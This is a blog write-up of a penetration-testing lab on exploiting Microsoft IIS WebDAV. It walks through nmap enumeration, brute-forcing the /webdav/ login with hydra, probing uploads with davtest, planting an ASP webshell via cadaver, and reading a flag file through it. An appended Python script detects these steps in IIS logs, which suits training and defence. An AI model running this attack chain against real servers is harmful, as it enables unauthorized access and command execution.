Exploiting Microsoft IIS WebDAV

Posted by r3kind1e on September 4, 2022

Exploiting Microsoft IIS WebDAV

Microsoft IIS

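IIS (Internet Information Services) is a proprietary, extensible web server software developed by Microsoft for use with the Windows NT family.

It can be used to host websites/web applications and provides administrators with a robust GUI for managing websites.

IIS can be used to host both static and dynamic web pages developed in ASP.NET and PHP.

It is typically configured to run on ports 80/443.

Supported executable file extensions: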

  • .asp
  • .aspx
  • .config
  • .php

WebDAV

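WebDAV (Web-based Distributed Authoring and Versioning) is a set of extensions to the HTTP protocol which allow users to collaboratively edit and manage files on remote web servers.

WebDAV essentially enables a web server to function as a file server for collaborative authoring.

WebDAV runs on top of Microsoft IIS on ports 80/443.

In order to connect to a WebDAV server, you need to provide legitimate credentials. This is because WebDAV implements authentication in the form of a username and password.

Exploiting WebDAV

The first step of the exploitation process involves identifying whether WebDAV has been configured to run on the IIS web server.

We can perform a brute-force attack on the WebDAV server in order to identify legitimate credentials that can be used for authentication.

After obtaining legitimate credentials, we can authenticate with the WebDAV server and upload a malicious .asp payload that can be used to execute arbitrary commands or obtain a reverse shell on the target.

Tools

Davtest - Used to scan, authenticate and exploit a WebDAV server.

Cadaver - cadaver supports file upload, download, on-screen display, in-place editing, namespace operations (move/copy), collection creation and deletion, property manipulation, and resource locking on WebDAV servers.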

video

Target IP Address: 10.2.17.124

-sV: Perform service version detection.

-sC: Perform a script scan using the default nmap scripts.

nmap -sV -sC 10.2.17.124

http-enum: This essentially tells us where the WebDAV directory is and whether WebDAV is configured on the web server.

http-enum

nmap -sV -p 80 --script=http-enum 10.2.17.124

Entering the target IP address redirects to:

10.2.17.124/Default.aspx

Accessing the /webdav/ directory requires HTTP authentication.

10.2.17.124/webdav/

/webdav/: The directory that contains the authorization form.

hydra -L /usr/share/wordlists/metasploit/common_users.txt -P /usr/share/wordlists/metasploit/common_passwords.txt 10.2.17.124 http-get /webdav/

Enter the following username and password in the Authentication Required window:

Username: bob
Password: password_123321

WebDAV is a protocol that essentially allows us to upload and download files from this directory, as well as modify and delete files within it. We can do this using various tools; we are going to start with davtest.

Davtest

davtest

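DAVTest tests WebDAV enabled servers by uploading test executable files, and then (optionally) uploading files which allow for command execution or other actions directly on the target. It is meant for penetration testers to quickly and easily determine if enabled DAV services are exploitable.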

davtest
root@kali:~# davtest -h
^^^^^^^^^^^^^^ 错误 ^^^^^^^^^^^^^^

/usr/bin/davtest -url <url> [选项]

  -auth+ 授权(用户:密码)
  -cleanup 完成后删除所有上传的内容
  -directory+ 要创建的目录的后缀部分
  -debug+ DAV 调试级别 1-3 (2 & 3 log req/resp to /tmp/perldav_debug.txt)
  -move PUT 文本文件,然后移动到可执行文件
  -nocreate 不创建目录
  -quiet 只打印摘要
  -rand+ 使用它而不是文件名的随机字符串
  -sendbd+ 发送后门:
        auto - 对于任何成功的测试
        ext - 后门/目录中匹配文件名的扩展名
  -uploadfile+ 上传这个文件(需要 -uploadloc)
  -uploadloc+ 将文件上传到此位置/名称(需要 -uploadfile)
  -url+ DAV 位置的 url

示例:/usr/bin/davtest -url http://localhost/davdir

Check whether WebDAV has been configured on the web server, then authenticate with WebDAV.

davtest -url http://10.2.17.124/webdav
davtest -auth bob:password_123321 -url http://10.2.17.124/webdav

It performs a series of checks: what types of files can be uploaded, and what types of files can be executed on the WebDAV server.

We can generate an ASP payload, or utilize an ASP webshell to obtain some form of command execution on the target, because ASP files execute here.

We can utilize cadaver to upload the ASP shell.

cadaver
dav:!>

Cadaver

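cadaver supports file upload, download, on-screen display, in-place editing, namespace operations (move/copy), collection creation and deletion, property manipulation, and resource locking.

Its operation is similar to the standard BSD ftp(1) client and the Samba Project's smbclient(1).

This package includes GnuTLS (HTTPS) support.

WebDAV (Web-based Distributed Authoring and Versioning) is a set of extensions to the HTTP protocol which allow users to collaboratively edit and manage files on remote web servers.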

cadaver --help

A command-line WebDAV client for Unix.

root@kali:~# cadaver -h
用法:cadaver [OPTIONS] http://hostname[:port]/path
   端口默认为 80,路径默认为 '/'
选项:
   -t,--allow 允许 cd/open 进入未启用 WebDAV 的集合。
   -r, --rcfile=FILE 从 FILE 而不是 ~/.cadaverrc 中读取脚本。
   -p, --proxy=PROXY[:PORT] 使用代理主机 PROXY 和可选的代理端口 PORT。
   -V, --version 显示版本信息。
   -h, --help 显示此帮助消息。
请将错误报告和功能请求发送至 <cadaver@webdav.org>
cadaver http://10.2.17.124/webdav

dav:/webdav/> ls

We can upload a webshell in order to obtain some form of command execution on the target system. To do that, we open a new tab here. Kali Linux comes prepackaged with a series of webshells, which can be accessed under:

ls -al /usr/share/webshells/
asp/    aspx/   cfm/    jsp/    laudanum/   perl/   php/    seclists/

Only ASP files can be executed:

ls -al /usr/share/webshells/asp/
cmd-asp-5.1.asp cmdasp.asp  webshell.asp

Upload webshell.asp to the WebDAV directory.

Switch back to cadaver.

dav:/webdav/> put /usr/share/webshells/asp/webshell.asp

Back in the browser, refresh the listing of the WebDAV directory:

10.2.17.124/webdav

We can launch the webshell by clicking on it, which presents an input box. It allows us to execute commands on the target system, and the output of those commands is displayed on this page.

10.2.17.124/webdav/webshell.asp

Because the target is a Windows system, we can run:

whoami
ipconfig
dir C:\
type C:\flag.txt

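Windows: IIS Server DAVTest

Overview

A Kali GUI machine and a vulnerable target machine are provided to you. The IP address of the target machine is provided in a text file named target on the Desktop of the Kali machine (/root/Desktop/target).

Your task is to fingerprint the service using the tools available on the Kali machine and exploit it using the Davtest and Cadaver tools.

Davtest:

  • Davtest is a WebDAV scanner that sends exploit files to the WebDAV server, automatically creates a directory and uploads files of different format types. The tool also tries to execute the uploaded files and gives us the output of the files that executed successfully.

cadaver:

  • Cadaver is a WebDAV client tool with a command-line style interface. It supports operations such as uploading, editing and moving files.

Objective: Exploit the service and retrieve the flag!

The following username and password can be used to access the service:

Username Password
bob password_123321

Instructions:

  • Your Kali machine has an interface with IP address 10.10.X.Y. Run "ip addr" to know the values of X and Y.
  • The IP address of the target machine is mentioned in the file "/root/Desktop/target".
  • Do not attack the gateway located at IP address 192.V.W.1 and 10.10.X.1.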

My own approach

Target IP Address : 10.0.24.74
root@attackdefense:~# nmap -sV 10.0.24.74
Starting Nmap 7.91 ( https://nmap.org ) at 2022-09-04 08:13 IST
Nmap scan report for 10.0.24.74
Host is up (0.0041s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3306/tcp open  mysql         MySQL (unauthorized)
3389/tcp open  ms-wbt-server Microsoft Terminal Services
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.02 seconds

root@attackdefense:~# nmap -sV -sC 10.0.24.74
Starting Nmap 7.91 ( https://nmap.org ) at 2022-09-04 08:17 IST
Nmap scan report for 10.0.24.74
Host is up (0.0037s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE COPY PROPFIND LOCK UNLOCK PROPPATCH MKCOL PUT DELETE MOVE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to /Default.aspx
| http-webdav-scan: 
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, LOCK, UNLOCK
|   Server Type: Microsoft-IIS/10.0
|   WebDAV type: Unknown
|   Public Options: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK
|_  Server Date: Sun, 04 Sep 2022 02:48:05 GMT
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3306/tcp open  mysql         MySQL (unauthorized)
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: DOTNETGOAT
|   NetBIOS_Domain_Name: DOTNETGOAT
|   NetBIOS_Computer_Name: DOTNETGOAT
|   DNS_Domain_Name: DotNetGoat
|   DNS_Computer_Name: DotNetGoat
|   Product_Version: 10.0.17763
|_  System_Time: 2022-09-04T02:48:06+00:00
| ssl-cert: Subject: commonName=DotNetGoat
| Not valid before: 2022-09-03T02:42:17
|_Not valid after:  2023-03-05T02:42:17
|_ssl-date: 2022-09-04T02:48:13+00:00; 0s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-09-04T02:48:08
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.67 seconds
root@attackdefense:~# nmap -sV -p 80 --script=http-enum 10.0.24.74
Starting Nmap 7.91 ( https://nmap.org ) at 2022-09-04 08:28 IST
Nmap scan report for 10.0.24.74
Host is up (0.0036s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
| http-enum: 
|_  /webdav/: Potentially interesting folder (401 Unauthorized)
|_http-server-header: Microsoft-IIS/10.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.33 seconds

Entering the target IP address redirects to:

http://10.0.24.74/Default.aspx

Accessing the /webdav/ directory requires HTTP authentication:

10.2.17.124/webdav/

/webdav/: The directory that contains the authentication form.

root@attackdefense:~# ls /usr/share/wordlists/metasploit/

common_passwords.txt
common_users.txt
root@attackdefense:~# hydra -L /usr/share/wordlists/metasploit/common_users.txt -P /usr/share/wordlists/metasploit/common_passwords.txt 10.0.24.74 http-get /webdav/
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-04 08:40:19
[DATA] max 16 tasks per 1 server, overall 16 tasks, 400 login tries (l:8/p:50), ~25 tries per task
[DATA] attacking http-get://10.0.24.74:80/webdav/
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-09-04 08:40:22

Enter the following username and password in the Authentication Required window:

bob:password_123321

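WebDAV is a protocol that allows us to upload and download files from this directory, as well as modify and delete files within it. We can do this using various tools; we will start with davtest.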

Davtest

DAVTest tests WebDAV enabled servers by uploading test executable files, and then (optionally) uploading files which allow for command execution or other actions directly on the target. It is meant for penetration testers to quickly and easily determine if enabled DAV services are exploitable.

Check whether WebDAV has been configured on the web server, then authenticate with WebDAV.

root@attackdefense:~# davtest -url http://10.0.24.74/webdav/
********************************************************
 Testing DAV connection
OPEN		FAIL:	http://10.0.24.74/webdav	Unauthorized. Basic realm="10.0.24.74"

root@attackdefense:~# davtest -auth bob:password_123321 -url http://10.0.24.74/webdav/
********************************************************
 Testing DAV connection
OPEN		SUCCEED:		http://10.0.24.74/webdav
********************************************************
NOTE	Random string for this session: YZdrheF_F_5VrQ
********************************************************
 Creating directory
MKCOL		SUCCEED:		Created http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ
********************************************************
 Sending test files
PUT	pl	SUCCEED:	http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.pl
PUT	shtml	SUCCEED:	http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.shtml
PUT	cfm	SUCCEED:	http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.cfm
PUT	jsp	SUCCEED:	http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.jsp
PUT	cgi	SUCCEED:	http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.cgi
PUT	aspx	SUCCEED:	http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.aspx
PUT	jhtml	SUCCEED:	http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.jhtml
PUT	html	SUCCEED:	http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.html
PUT	asp	SUCCEED:	http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.asp
PUT	txt	SUCCEED:	http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.txt
PUT	php	SUCCEED:	http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.php
********************************************************
 Checking for test file execution
EXEC	pl	FAIL
EXEC	shtml	FAIL
EXEC	cfm	FAIL
EXEC	jsp	FAIL
EXEC	cgi	FAIL
EXEC	aspx	FAIL
EXEC	jhtml	FAIL
EXEC	html	SUCCEED:	http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.html
EXEC	asp	SUCCEED:	http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.asp
EXEC	txt	SUCCEED:	http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.txt
EXEC	php	FAIL

********************************************************
/usr/bin/davtest Summary:
Created: http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ
PUT File: http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.pl
PUT File: http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.shtml
PUT File: http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.cfm
PUT File: http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.jsp
PUT File: http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.cgi
PUT File: http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.aspx
PUT File: http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.jhtml
PUT File: http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.html
PUT File: http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.asp
PUT File: http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.txt
PUT File: http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.php
Executes: http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.html
Executes: http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.asp
Executes: http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.txt

Three test files were executed, so we can upload an ASP webshell.

Checking for test file execution

EXEC	html	SUCCEED:	http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.html
EXEC	asp	SUCCEED:	http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.asp
EXEC	txt	SUCCEED:	http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.txt

Cadaver

cadaver supports file upload, download, on-screen display, in-place editing, namespace operations (move/copy), collection creation and deletion, property manipulation, and resource locking.

Its operation is similar to the standard BSD ftp(1) client and the Samba Project’s smbclient(1).

This package includes GnuTLS (HTTPS) support.

WebDAV (Web-based Distributed Authoring and Versioning) is a set of extensions to the HTTP protocol which allow users to collaboratively edit and manage files on remote web servers.

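We can upload a webshell in order to obtain some form of command execution on the target system. To do that, we open a new tab here. Kali Linux comes prepackaged with webshells, which can be accessed at the following location:

Because the lab was restarted, the target IP changed: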

Target IP Address : 10.0.28.114
root@attackdefense:~# ls /usr/share/webshells/
asp  aspx  cfm	jsp  laudanum  perl  php  seclists
root@attackdefense:~# ls /usr/share/webshells/asp
cmd-asp-5.1.asp  cmdasp.asp  webshell.asp

Upload the ASP webshell:

root@attackdefense:~# cadaver http://10.0.28.114/webdav/
Authentication required for 10.0.28.114 on server `10.0.28.114':
Username: bob
Password: 
dav:/webdav/> ls
Listing collection `/webdav/': succeeded.
        AttackDefense.txt                     13  Jan  2  2021
        web.config                           168  Jan  2  2021
dav:/webdav/> help
Available commands: 
 ls         cd         pwd        put        get        mget       mput       
 edit       less       mkcol      cat        delete     rmcol      copy       
 move       lock       unlock     discover   steal      showlocks  version    
 checkin    checkout   uncheckout history    label      propnames  chexec     
 propget    propdel    propset    search     set        open       close      
 echo       quit       unset      lcd        lls        lpwd       logout     
 help       describe   about      
Aliases: rm=delete, mkdir=mkcol, mv=move, cp=copy, more=less, quit=exit=bye
dav:/webdav/> put /usr/share/webshells/asp/webshell.asp 
Uploading /usr/share/webshells/asp/webshell.asp to `/webdav/webshell.asp':
Progress: [=============================>] 100.0% of 1362 bytes succeeded.
dav:/webdav/> ls
Listing collection `/webdav/': succeeded.
        AttackDefense.txt                     13  Jan  2  2021
        web.config                           168  Jan  2  2021
        webshell.asp                        1362  Sep  4 09:27

Access the uploaded ASP webshell:

http://10.0.28.114/webdav/webshell.asp
\\DOTNETGOAT\bob10.0.28.114


The server's port:
80


The server's software:
Microsoft-IIS/10.0


The server's local address:
10.0.28.114

Execute commands:

whoami

iis apppool\defaultapppool
ipconfig

Windows IP Configuration


Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . : ap-southeast-1.compute.internal
   Link-local IPv6 Address . . . . . : fe80::20e5:378b:e470:2dad%4
   IPv4 Address. . . . . . . . . . . : 10.0.28.114
   Subnet Mask . . . . . . . . . . . : 255.255.240.0
   Default Gateway . . . . . . . . . : 10.0.16.1

dir C:\

Volume in drive C has no label.
 Volume Serial Number is 9E32-0E96

 Directory of C:\

11/14/2018  06:56 AM    
          EFI
01/02/2021  01:01 PM                32 flag.txt
10/27/2020  06:45 AM    
          inetpub
05/13/2020  05:58 PM    
          PerfLogs
10/27/2020  02:18 PM    
          Program Files
10/27/2020  02:18 PM    
          Program Files (x86)
10/27/2020  02:21 PM    
          Users
10/27/2020  06:46 AM    
          Windows
               1 File(s)             32 bytes
               7 Dir(s)  16,243,744,768 bytes free
type C:\flag.txt

0cc175b9c0f1b6a831c399e269772661
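
The stages above (credential guessing against /webdav/, the DAVTest probe, and a PUT of an .asp file followed by a request for it) each leave a recognisable pattern in the IIS access log. The following is an added example, not part of the original post or the lab: a small Python detector for those patterns in W3C-format log lines. The log excerpt, the user alice, the client addresses, the rule names and the failure threshold are constructed assumptions.

```python
from collections import Counter

# Constructed IIS W3C log excerpt (not from the page). Real logs carry more
# columns; the "#Fields:" directive tells the parser which ones are present.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-username c-ip sc-status
2022-09-04 03:10:19 GET /webdav/ - 198.51.100.7 401
2022-09-04 03:10:19 GET /webdav/ - 198.51.100.7 401
2022-09-04 03:10:20 GET /webdav/ - 198.51.100.7 401
2022-09-04 03:10:20 GET /webdav/ - 198.51.100.7 401
2022-09-04 03:10:21 GET /webdav/ - 198.51.100.7 401
2022-09-04 03:20:02 MKCOL /webdav/DavTestDir_EXAMPLE bob 198.51.100.7 201
2022-09-04 03:20:03 PUT /webdav/DavTestDir_EXAMPLE/davtest_EXAMPLE.asp bob 198.51.100.7 201
2022-09-04 03:57:11 PUT /webdav/webshell.asp bob 198.51.100.7 201
2022-09-04 03:58:40 GET /webdav/webshell.asp bob 198.51.100.7 200
2022-09-04 04:02:00 PUT /webdav/notes.txt alice 203.0.113.9 201
2022-09-04 04:02:05 GET /webdav/notes.txt alice 203.0.113.9 200
"""

# Extensions the page lists as executable on IIS.
SCRIPT_EXT = (".asp", ".aspx", ".config", ".php")

def parse(log):
    """Yield one dict per request, keyed by the names in the #Fields directive."""
    fields = []
    for line in log.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            yield dict(zip(fields, line.split()))

def detect(log, dav_root="/webdav", fail_threshold=5):
    """Return (rule, client_ip, uri) findings in the order they first occur."""
    failures, uploaded, findings = Counter(), set(), []

    def flag(rule, ip, uri):
        if (rule, ip, uri) not in findings:
            findings.append((rule, ip, uri))

    for r in parse(log):
        method, uri, ip = r["cs-method"], r["cs-uri-stem"], r["c-ip"]
        status, low = int(r["sc-status"]), r["cs-uri-stem"].lower()
        # A single 401 is the normal Basic-auth challenge; a burst is guessing.
        if status == 401 and low.startswith(dav_root):
            failures[ip] += 1
            if failures[ip] >= fail_threshold:
                flag("auth-bruteforce", ip, dav_root + "/")
        # DAVTest creates a DavTestDir_<random> collection before its PUTs.
        if method == "MKCOL" and "/davtestdir_" in low and status < 300:
            flag("davtest-probe", ip, uri)
        if method == "PUT" and status < 300 and low.endswith(SCRIPT_EXT):
            uploaded.add(low)
            flag("script-upload", ip, uri)
        elif method in ("GET", "POST") and status == 200 and low in uploaded:
            flag("uploaded-script-requested", ip, uri)
    return findings
```
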

Solution

The solution for this lab can be found in the following manual: https://assets.ine.com/labs/ad-manuals/walkthrough-2317.pdf

DAVTest

Cadaver

ASP Webshell